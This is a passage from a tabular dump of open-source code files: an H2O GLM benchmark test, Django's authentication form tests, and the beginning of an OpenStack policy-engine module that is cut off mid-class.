repo_name
stringlengths 6
100
| path
stringlengths 4
294
| copies
stringlengths 1
5
| size
stringlengths 4
6
| content
stringlengths 606
896k
| license
stringclasses 15
values |
---|---|---|---|---|---|
eg-zhang/h2o-2 | py/testdir_multi_jvm/test_GLM2_covtype_exec.py | 9 | 2344 | import unittest, time, sys, random
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_glm, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
h2o.init(3,java_heap_GB=4)
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_GLM2_covtype_exec(self):
csvFilename = 'covtype.data'
csvPathname = 'standard/' + csvFilename
hex_key = 'covtype.hex'
parseResult = h2i.import_parse(bucket='home-0xdiag-datasets', path=csvPathname, schema='put',
hex_key=hex_key, timeoutSecs=30)
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'])
print "\n" + csvPathname, \
" numRows:", "{:,}".format(inspect['numRows']), \
" numCols:", "{:,}".format(inspect['numCols'])
print "WARNING: max_iter set to 8 for benchmark comparisons"
max_iter = 8
y = "54"
h2o_cmd.runExec(str='%s[,55] = %s[,55]==1' % (hex_key, hex_key))
# L2
kwargs = {
'response': y,
'family': 'binomial',
'n_folds': 0,
'max_iter': max_iter,
'beta_epsilon': 1e-3}
timeoutSecs = 120
start = time.time()
kwargs.update({'alpha': 0, 'lambda': 0})
glm = h2o_cmd.runGLM(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs)
print "glm (L2) end on ", csvPathname, 'took', time.time() - start, 'seconds'
h2o_glm.simpleCheckGLM(self, glm, 'C14', **kwargs)
# Elastic
kwargs.update({'alpha': 0.5, 'lambda': 1e-4})
start = time.time()
glm = h2o_cmd.runGLM(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs)
print "glm (Elastic) end on ", csvPathname, 'took', time.time() - start, 'seconds'
h2o_glm.simpleCheckGLM(self, glm, 'C14', **kwargs)
# L1
kwargs.update({'alpha': 1, 'lambda': 1e-4})
start = time.time()
glm = h2o_cmd.runGLM(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs)
print "glm (L1) end on ", csvPathname, 'took', time.time() - start, 'seconds'
h2o_glm.simpleCheckGLM(self, glm, 'C14', **kwargs)
if __name__ == '__main__':
h2o.unit_main()
| apache-2.0 |
avneesh91/django | tests/auth_tests/test_forms.py | 15 | 34291 | import datetime
import re
from unittest import mock
from django import forms
from django.contrib.auth.forms import (
AdminPasswordChangeForm, AuthenticationForm, PasswordChangeForm,
PasswordResetForm, ReadOnlyPasswordHashField, ReadOnlyPasswordHashWidget,
SetPasswordForm, UserChangeForm, UserCreationForm,
)
from django.contrib.auth.models import User
from django.contrib.auth.signals import user_login_failed
from django.contrib.sites.models import Site
from django.core import mail
from django.core.mail import EmailMultiAlternatives
from django.forms.fields import CharField, Field, IntegerField
from django.test import SimpleTestCase, TestCase, override_settings
from django.utils import translation
from django.utils.text import capfirst
from django.utils.translation import gettext as _
from .models.custom_user import (
CustomUser, CustomUserWithoutIsActiveField, ExtensionUser,
)
from .models.with_custom_email_field import CustomEmailField
from .models.with_integer_username import IntegerUsernameUser
from .settings import AUTH_TEMPLATES
class TestDataMixin:
@classmethod
def setUpTestData(cls):
cls.u1 = User.objects.create_user(username='testclient', password='password', email='[email protected]')
cls.u2 = User.objects.create_user(username='inactive', password='password', is_active=False)
cls.u3 = User.objects.create_user(username='staff', password='password')
cls.u4 = User.objects.create(username='empty_password', password='')
cls.u5 = User.objects.create(username='unmanageable_password', password='$')
cls.u6 = User.objects.create(username='unknown_password', password='foo$bar')
class UserCreationFormTest(TestDataMixin, TestCase):
def test_user_already_exists(self):
data = {
'username': 'testclient',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[str(User._meta.get_field('username').error_messages['unique'])])
def test_invalid_data(self):
data = {
'username': 'jsmith!',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
validator = next(v for v in User._meta.get_field('username').validators if v.code == 'invalid')
self.assertEqual(form["username"].errors, [str(validator.message)])
def test_password_verification(self):
# The verification password is incorrect.
data = {
'username': 'jsmith',
'password1': 'test123',
'password2': 'test',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["password2"].errors,
[str(form.error_messages['password_mismatch'])])
def test_both_passwords(self):
# One (or both) passwords weren't given
data = {'username': 'jsmith'}
form = UserCreationForm(data)
required_error = [str(Field.default_error_messages['required'])]
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors, required_error)
self.assertEqual(form['password2'].errors, required_error)
data['password2'] = 'test123'
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors, required_error)
self.assertEqual(form['password2'].errors, [])
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
# The success case.
data = {
'username': '[email protected]',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
u = form.save()
self.assertEqual(password_changed.call_count, 1)
self.assertEqual(repr(u), '<User: [email protected]>')
def test_unicode_username(self):
data = {
'username': '宝',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
u = form.save()
self.assertEqual(u.username, '宝')
def test_normalize_username(self):
# The normalization happens in AbstractBaseUser.clean() and ModelForm
# validation calls Model.clean().
ohm_username = 'testΩ' # U+2126 OHM SIGN
data = {
'username': ohm_username,
'password1': 'pwd2',
'password2': 'pwd2',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
user = form.save()
self.assertNotEqual(user.username, ohm_username)
self.assertEqual(user.username, 'testΩ') # U+03A9 GREEK CAPITAL LETTER OMEGA
def test_duplicate_normalized_unicode(self):
"""
To prevent almost identical usernames, visually identical but differing
by their unicode code points only, Unicode NFKC normalization should
make appear them equal to Django.
"""
omega_username = 'iamtheΩ' # U+03A9 GREEK CAPITAL LETTER OMEGA
ohm_username = 'iamtheΩ' # U+2126 OHM SIGN
self.assertNotEqual(omega_username, ohm_username)
User.objects.create_user(username=omega_username, password='pwd')
data = {
'username': ohm_username,
'password1': 'pwd2',
'password2': 'pwd2',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors['username'], ["A user with that username already exists."]
)
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
{'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 'OPTIONS': {
'min_length': 12,
}},
])
def test_validates_password(self):
data = {
'username': 'testclient',
'password1': 'testclient',
'password2': 'testclient',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(len(form['password2'].errors), 2)
self.assertIn('The password is too similar to the username.', form['password2'].errors)
self.assertIn(
'This password is too short. It must contain at least 12 characters.',
form['password2'].errors
)
def test_custom_form(self):
class CustomUserCreationForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
model = ExtensionUser
fields = UserCreationForm.Meta.fields + ('date_of_birth',)
data = {
'username': 'testclient',
'password1': 'testclient',
'password2': 'testclient',
'date_of_birth': '1988-02-24',
}
form = CustomUserCreationForm(data)
self.assertTrue(form.is_valid())
def test_custom_form_with_different_username_field(self):
class CustomUserCreationForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
model = CustomUser
fields = ('email', 'date_of_birth')
data = {
'email': '[email protected]',
'password1': 'testclient',
'password2': 'testclient',
'date_of_birth': '1988-02-24',
}
form = CustomUserCreationForm(data)
self.assertTrue(form.is_valid())
def test_custom_form_hidden_username_field(self):
class CustomUserCreationForm(UserCreationForm):
class Meta(UserCreationForm.Meta):
model = CustomUserWithoutIsActiveField
fields = ('email',) # without USERNAME_FIELD
data = {
'email': '[email protected]',
'password1': 'testclient',
'password2': 'testclient',
}
form = CustomUserCreationForm(data)
self.assertTrue(form.is_valid())
def test_password_whitespace_not_stripped(self):
data = {
'username': 'testuser',
'password1': ' testpassword ',
'password2': ' testpassword ',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['password1'], data['password1'])
self.assertEqual(form.cleaned_data['password2'], data['password2'])
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
])
def test_password_help_text(self):
form = UserCreationForm()
self.assertEqual(
form.fields['password1'].help_text,
'<ul><li>Your password can't be too similar to your other personal information.</li></ul>'
)
# To verify that the login form rejects inactive users, use an authentication
# backend that allows them.
@override_settings(AUTHENTICATION_BACKENDS=['django.contrib.auth.backends.AllowAllUsersModelBackend'])
class AuthenticationFormTest(TestDataMixin, TestCase):
def test_invalid_username(self):
# The user submits an invalid username.
data = {
'username': 'jsmith_does_not_exist',
'password': 'test123',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(
form.non_field_errors(), [
form.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
}
]
)
def test_inactive_user(self):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), [str(form.error_messages['inactive'])])
def test_login_failed(self):
signal_calls = []
def signal_handler(**kwargs):
signal_calls.append(kwargs)
user_login_failed.connect(signal_handler)
fake_request = object()
try:
form = AuthenticationForm(fake_request, {
'username': 'testclient',
'password': 'incorrect',
})
self.assertFalse(form.is_valid())
self.assertIs(signal_calls[0]['request'], fake_request)
finally:
user_login_failed.disconnect(signal_handler)
def test_inactive_user_i18n(self):
with self.settings(USE_I18N=True), translation.override('pt-br', deactivate=True):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), [str(form.error_messages['inactive'])])
def test_custom_login_allowed_policy(self):
# The user is inactive, but our custom form policy allows them to log in.
data = {
'username': 'inactive',
'password': 'password',
}
class AuthenticationFormWithInactiveUsersOkay(AuthenticationForm):
def confirm_login_allowed(self, user):
pass
form = AuthenticationFormWithInactiveUsersOkay(None, data)
self.assertTrue(form.is_valid())
# If we want to disallow some logins according to custom logic,
# we should raise a django.forms.ValidationError in the form.
class PickyAuthenticationForm(AuthenticationForm):
def confirm_login_allowed(self, user):
if user.username == "inactive":
raise forms.ValidationError("This user is disallowed.")
raise forms.ValidationError("Sorry, nobody's allowed in.")
form = PickyAuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), ['This user is disallowed.'])
data = {
'username': 'testclient',
'password': 'password',
}
form = PickyAuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), ["Sorry, nobody's allowed in."])
def test_success(self):
# The success case
data = {
'username': 'testclient',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.non_field_errors(), [])
def test_unicode_username(self):
User.objects.create_user(username='Σαρα', password='pwd')
data = {
'username': 'Σαρα',
'password': 'pwd',
}
form = AuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.non_field_errors(), [])
def test_username_field_label(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField(label="Name", max_length=75)
form = CustomAuthenticationForm()
self.assertEqual(form['username'].label, "Name")
def test_username_field_label_not_set(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField()
form = CustomAuthenticationForm()
username_field = User._meta.get_field(User.USERNAME_FIELD)
self.assertEqual(form.fields['username'].label, capfirst(username_field.verbose_name))
def test_username_field_label_empty_string(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField(label='')
form = CustomAuthenticationForm()
self.assertEqual(form.fields['username'].label, "")
def test_password_whitespace_not_stripped(self):
data = {
'username': 'testuser',
'password': ' pass ',
}
form = AuthenticationForm(None, data)
form.is_valid() # Not necessary to have valid credentails for the test.
self.assertEqual(form.cleaned_data['password'], data['password'])
@override_settings(AUTH_USER_MODEL='auth_tests.IntegerUsernameUser')
def test_integer_username(self):
class CustomAuthenticationForm(AuthenticationForm):
username = IntegerField()
user = IntegerUsernameUser.objects.create_user(username=0, password='pwd')
data = {
'username': 0,
'password': 'pwd',
}
form = CustomAuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['username'], data['username'])
self.assertEqual(form.cleaned_data['password'], data['password'])
self.assertEqual(form.errors, {})
self.assertEqual(form.user_cache, user)
class SetPasswordFormTest(TestDataMixin, TestCase):
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(
form["new_password2"].errors,
[str(form.error_messages['password_mismatch'])]
)
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = SetPasswordForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
{'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 'OPTIONS': {
'min_length': 12,
}},
])
def test_validates_password(self):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'testclient',
'new_password2': 'testclient',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(len(form["new_password2"].errors), 2)
self.assertIn('The password is too similar to the username.', form["new_password2"].errors)
self.assertIn(
'This password is too short. It must contain at least 12 characters.',
form["new_password2"].errors
)
def test_password_whitespace_not_stripped(self):
user = User.objects.get(username='testclient')
data = {
'new_password1': ' password ',
'new_password2': ' password ',
}
form = SetPasswordForm(user, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['new_password1'], data['new_password1'])
self.assertEqual(form.cleaned_data['new_password2'], data['new_password2'])
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
{'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 'OPTIONS': {
'min_length': 12,
}},
])
def test_help_text_translation(self):
french_help_texts = [
'Votre mot de passe ne peut pas trop ressembler à vos autres informations personnelles.',
'Votre mot de passe doit contenir au minimum 12 caractères.',
]
form = SetPasswordForm(self.u1)
with translation.override('fr'):
html = form.as_p()
for french_text in french_help_texts:
self.assertIn(french_text, html)
class PasswordChangeFormTest(TestDataMixin, TestCase):
def test_incorrect_password(self):
user = User.objects.get(username='testclient')
data = {
'old_password': 'test',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["old_password"].errors, [str(form.error_messages['password_incorrect'])])
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors, [str(form.error_messages['password_mismatch'])])
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
# The success case.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
def test_field_order(self):
# Regression test - check the order of fields:
user = User.objects.get(username='testclient')
self.assertEqual(list(PasswordChangeForm(user, {}).fields), ['old_password', 'new_password1', 'new_password2'])
def test_password_whitespace_not_stripped(self):
user = User.objects.get(username='testclient')
user.set_password(' oldpassword ')
data = {
'old_password': ' oldpassword ',
'new_password1': ' pass ',
'new_password2': ' pass ',
}
form = PasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['old_password'], data['old_password'])
self.assertEqual(form.cleaned_data['new_password1'], data['new_password1'])
self.assertEqual(form.cleaned_data['new_password2'], data['new_password2'])
class UserChangeFormTest(TestDataMixin, TestCase):
def test_username_validity(self):
user = User.objects.get(username='testclient')
data = {'username': 'not valid'}
form = UserChangeForm(data, instance=user)
self.assertFalse(form.is_valid())
validator = next(v for v in User._meta.get_field('username').validators if v.code == 'invalid')
self.assertEqual(form["username"].errors, [str(validator.message)])
def test_bug_14242(self):
# A regression test, introduce by adding an optimization for the
# UserChangeForm.
class MyUserForm(UserChangeForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['groups'].help_text = 'These groups give users different permissions'
class Meta(UserChangeForm.Meta):
fields = ('groups',)
# Just check we can create it
MyUserForm({})
def test_unusable_password(self):
user = User.objects.get(username='empty_password')
user.set_unusable_password()
user.save()
form = UserChangeForm(instance=user)
self.assertIn(_("No password set."), form.as_table())
def test_bug_17944_empty_password(self):
user = User.objects.get(username='empty_password')
form = UserChangeForm(instance=user)
self.assertIn(_("No password set."), form.as_table())
def test_bug_17944_unmanageable_password(self):
user = User.objects.get(username='unmanageable_password')
form = UserChangeForm(instance=user)
self.assertIn(_("Invalid password format or unknown hashing algorithm."), form.as_table())
def test_bug_17944_unknown_password_algorithm(self):
user = User.objects.get(username='unknown_password')
form = UserChangeForm(instance=user)
self.assertIn(_("Invalid password format or unknown hashing algorithm."), form.as_table())
def test_bug_19133(self):
"The change form does not return the password value"
# Use the form to construct the POST data
user = User.objects.get(username='testclient')
form_for_data = UserChangeForm(instance=user)
post_data = form_for_data.initial
# The password field should be readonly, so anything
# posted here should be ignored; the form will be
# valid, and give back the 'initial' value for the
# password field.
post_data['password'] = 'new password'
form = UserChangeForm(instance=user, data=post_data)
self.assertTrue(form.is_valid())
# original hashed password contains $
self.assertIn('$', form.cleaned_data['password'])
def test_bug_19349_bound_password_field(self):
user = User.objects.get(username='testclient')
form = UserChangeForm(data={}, instance=user)
# When rendering the bound password field,
# ReadOnlyPasswordHashWidget needs the initial
# value to render correctly
self.assertEqual(form.initial['password'], form['password'].value())
def test_custom_form(self):
class CustomUserChangeForm(UserChangeForm):
class Meta(UserChangeForm.Meta):
model = ExtensionUser
fields = ('username', 'password', 'date_of_birth',)
user = User.objects.get(username='testclient')
data = {
'username': 'testclient',
'password': 'testclient',
'date_of_birth': '1998-02-24',
}
form = CustomUserChangeForm(data, instance=user)
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(form.cleaned_data['username'], 'testclient')
self.assertEqual(form.cleaned_data['date_of_birth'], datetime.date(1998, 2, 24))
@override_settings(TEMPLATES=AUTH_TEMPLATES)
class PasswordResetFormTest(TestDataMixin, TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
# This cleanup is necessary because contrib.sites cache
# makes tests interfere with each other, see #11505
Site.objects.clear_cache()
def create_dummy_user(self):
"""
Create a user and return a tuple (user_object, username, email).
"""
username = 'jsmith'
email = '[email protected]'
user = User.objects.create_user(username, email, 'test123')
return (user, username, email)
def test_invalid_email(self):
data = {'email': 'not valid'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['email'].errors, [_('Enter a valid email address.')])
def test_nonexistent_email(self):
"""
Test nonexistent email address. This should not fail because it would
expose information about registered users.
"""
data = {'email': '[email protected]'}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
self.assertEqual(len(mail.outbox), 0)
def test_cleaned_data(self):
(user, username, email) = self.create_dummy_user()
data = {'email': email}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
form.save(domain_override='example.com')
self.assertEqual(form.cleaned_data['email'], email)
self.assertEqual(len(mail.outbox), 1)
def test_custom_email_subject(self):
data = {'email': '[email protected]'}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
# Since we're not providing a request object, we must provide a
# domain_override to prevent the save operation from failing in the
# potential case where contrib.sites is not installed. Refs #16412.
form.save(domain_override='example.com')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'Custom password reset on example.com')
def test_custom_email_constructor(self):
data = {'email': '[email protected]'}
class CustomEmailPasswordResetForm(PasswordResetForm):
def send_mail(self, subject_template_name, email_template_name,
context, from_email, to_email,
html_email_template_name=None):
EmailMultiAlternatives(
"Forgot your password?",
"Sorry to hear you forgot your password.",
None, [to_email],
['[email protected]'],
headers={'Reply-To': '[email protected]'},
alternatives=[
("Really sorry to hear you forgot your password.", "text/html")
],
).send()
form = CustomEmailPasswordResetForm(data)
self.assertTrue(form.is_valid())
# Since we're not providing a request object, we must provide a
# domain_override to prevent the save operation from failing in the
# potential case where contrib.sites is not installed. Refs #16412.
form.save(domain_override='example.com')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'Forgot your password?')
self.assertEqual(mail.outbox[0].bcc, ['[email protected]'])
self.assertEqual(mail.outbox[0].content_subtype, "plain")
def test_preserve_username_case(self):
"""
Preserve the case of the user name (before the @ in the email address)
when creating a user (#5605).
"""
user = User.objects.create_user('forms_test2', '[email protected]', 'test')
self.assertEqual(user.email, '[email protected]')
user = User.objects.create_user('forms_test3', 'tesT', 'test')
self.assertEqual(user.email, 'tesT')
def test_inactive_user(self):
"""
Inactive user cannot receive password reset email.
"""
(user, username, email) = self.create_dummy_user()
user.is_active = False
user.save()
form = PasswordResetForm({'email': email})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 0)
def test_unusable_password(self):
user = User.objects.create_user('testuser', '[email protected]', 'test')
data = {"email": "[email protected]"}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
user.set_unusable_password()
user.save()
form = PasswordResetForm(data)
# The form itself is valid, but no email is sent
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 0)
def test_save_plaintext_email(self):
"""
Test the PasswordResetForm.save() method with no html_email_template_name
parameter passed in.
Test to ensure original behavior is unchanged after the parameter was added.
"""
(user, username, email) = self.create_dummy_user()
form = PasswordResetForm({"email": email})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0].message()
self.assertFalse(message.is_multipart())
self.assertEqual(message.get_content_type(), 'text/plain')
self.assertEqual(message.get('subject'), 'Custom password reset on example.com')
self.assertEqual(len(mail.outbox[0].alternatives), 0)
self.assertEqual(message.get_all('to'), [email])
self.assertTrue(re.match(r'^http://example.com/reset/[\w+/-]', message.get_payload()))
def test_save_html_email_template_name(self):
"""
Test the PasswordResetFOrm.save() method with html_email_template_name
parameter specified.
Test to ensure that a multipart email is sent with both text/plain
and text/html parts.
"""
(user, username, email) = self.create_dummy_user()
form = PasswordResetForm({"email": email})
self.assertTrue(form.is_valid())
form.save(html_email_template_name='registration/html_password_reset_email.html')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(len(mail.outbox[0].alternatives), 1)
message = mail.outbox[0].message()
self.assertEqual(message.get('subject'), 'Custom password reset on example.com')
self.assertEqual(len(message.get_payload()), 2)
self.assertTrue(message.is_multipart())
self.assertEqual(message.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(message.get_payload(1).get_content_type(), 'text/html')
self.assertEqual(message.get_all('to'), [email])
self.assertTrue(re.match(r'^http://example.com/reset/[\w/-]+', message.get_payload(0).get_payload()))
self.assertTrue(re.match(
r'^<html><a href="http://example.com/reset/[\w/-]+/">Link</a></html>$',
message.get_payload(1).get_payload()
))
@override_settings(AUTH_USER_MODEL='auth_tests.CustomEmailField')
def test_custom_email_field(self):
email = '[email protected]'
CustomEmailField.objects.create_user('test name', 'test password', email)
form = PasswordResetForm({'email': email})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(form.cleaned_data['email'], email)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].to, [email])
class ReadOnlyPasswordHashTest(SimpleTestCase):
def test_bug_19349_render_with_none_value(self):
# Rendering the widget with value set to None
# mustn't raise an exception.
widget = ReadOnlyPasswordHashWidget()
html = widget.render(name='password', value=None, attrs={})
self.assertIn(_("No password set."), html)
def test_readonly_field_has_changed(self):
field = ReadOnlyPasswordHashField()
self.assertFalse(field.has_changed('aaa', 'bbb'))
class AdminPasswordChangeFormTest(TestDataMixin, TestCase):
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
user = User.objects.get(username='testclient')
data = {
'password1': 'test123',
'password2': 'test123',
}
form = AdminPasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
def test_password_whitespace_not_stripped(self):
user = User.objects.get(username='testclient')
data = {
'password1': ' pass ',
'password2': ' pass ',
}
form = AdminPasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['password1'], data['password1'])
self.assertEqual(form.cleaned_data['password2'], data['password2'])
| bsd-3-clause |
vipulsabhaya/cue | cue/openstack/common/policy.py | 1 | 28680 | # Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Common Policy Engine Implementation
Policies can be expressed in one of two forms: A list of lists, or a
string written in the new policy language.
In the list-of-lists representation, each check inside the innermost
list is combined as with an "and" conjunction--for that check to pass,
all the specified checks must pass. These innermost lists are then
combined as with an "or" conjunction. This is the original way of
expressing policies, but there now exists a new way: the policy
language.
In the policy language, each check is specified the same way as in the
list-of-lists representation: a simple "a:b" pair that is matched to
the correct code to perform that check. However, conjunction
operators are available, allowing for more expressiveness in crafting
policies.
As an example, take the following rule, expressed in the list-of-lists
representation::
[["role:admin"], ["project_id:%(project_id)s", "role:projectadmin"]]
In the policy language, this becomes::
role:admin or (project_id:%(project_id)s and role:projectadmin)
The policy language also has the "not" operator, allowing a richer
policy rule::
project_id:%(project_id)s and not role:dunce
It is possible to perform policy checks on the following user
attributes (obtained through the token): user_id, domain_id or
project_id::
domain_id:<some_value>
Attributes sent along with API calls can be used by the policy engine
(on the right side of the expression), by using the following syntax::
<some_value>:user.id
Contextual attributes of objects identified by their IDs are loaded
from the database. They are also available to the policy engine and
can be checked through the `target` keyword::
<some_value>:target.role.name
All these attributes (related to users, API calls, and context) can be
checked against each other or against constants, be it literals (True,
<a_number>) or strings.
Finally, two special policy checks should be mentioned; the policy
check "@" will always accept an access, and the policy check "!" will
always reject an access. (Note that if a rule is either the empty
list ("[]") or the empty string, this is equivalent to the "@" policy
check.) Of these, the "!" policy check is probably the most useful,
as it allows particular rules to be explicitly disabled.
"""
import abc
import ast
import os
import re
from oslo.config import cfg
from oslo.serialization import jsonutils
import six
import six.moves.urllib.parse as urlparse
import six.moves.urllib.request as urlrequest
from cue.openstack.common import fileutils
from cue.openstack.common._i18n import _, _LE, _LW
from cue.openstack.common import log as logging
policy_opts = [
cfg.StrOpt('policy_file',
default='policy.json',
help=_('The JSON file that defines policies.')),
cfg.StrOpt('policy_default_rule',
default='default',
help=_('Default rule. Enforced when a requested rule is not '
'found.')),
cfg.MultiStrOpt('policy_dirs',
default=['policy.d'],
help=_('Directories where policy configuration files are '
'stored')),
]
CONF = cfg.CONF
CONF.register_opts(policy_opts)
LOG = logging.getLogger(__name__)
_checks = {}
class PolicyNotAuthorized(Exception):
def __init__(self, rule):
msg = _("Policy doesn't allow %s to be performed.") % rule
super(PolicyNotAuthorized, self).__init__(msg)
class Rules(dict):
"""A store for rules. Handles the default_rule setting directly."""
@classmethod
def load_json(cls, data, default_rule=None):
"""Allow loading of JSON rule data."""
# Suck in the JSON data and parse the rules
rules = dict((k, parse_rule(v)) for k, v in
jsonutils.loads(data).items())
return cls(rules, default_rule)
def __init__(self, rules=None, default_rule=None):
"""Initialize the Rules store."""
super(Rules, self).__init__(rules or {})
self.default_rule = default_rule
def __missing__(self, key):
"""Implements the default rule handling."""
if isinstance(self.default_rule, dict):
raise KeyError(key)
# If the default rule isn't actually defined, do something
# reasonably intelligent
if not self.default_rule:
raise KeyError(key)
if isinstance(self.default_rule, BaseCheck):
return self.default_rule
# We need to check this or we can get infinite recursion
if self.default_rule not in self:
raise KeyError(key)
elif isinstance(self.default_rule, six.string_types):
return self[self.default_rule]
def __str__(self):
"""Dumps a string representation of the rules."""
# Start by building the canonical strings for the rules
out_rules = {}
for key, value in self.items():
# Use empty string for singleton TrueCheck instances
if isinstance(value, TrueCheck):
out_rules[key] = ''
else:
out_rules[key] = str(value)
# Dump a pretty-printed JSON representation
return jsonutils.dumps(out_rules, indent=4)
class Enforcer(object):
"""Responsible for loading and enforcing rules.
:param policy_file: Custom policy file to use, if none is
specified, `CONF.policy_file` will be
used.
:param rules: Default dictionary / Rules to use. It will be
considered just in the first instantiation. If
`load_rules(True)`, `clear()` or `set_rules(True)`
is called this will be overwritten.
:param default_rule: Default rule to use, CONF.default_rule will
be used if none is specified.
:param use_conf: Whether to load rules from cache or config file.
"""
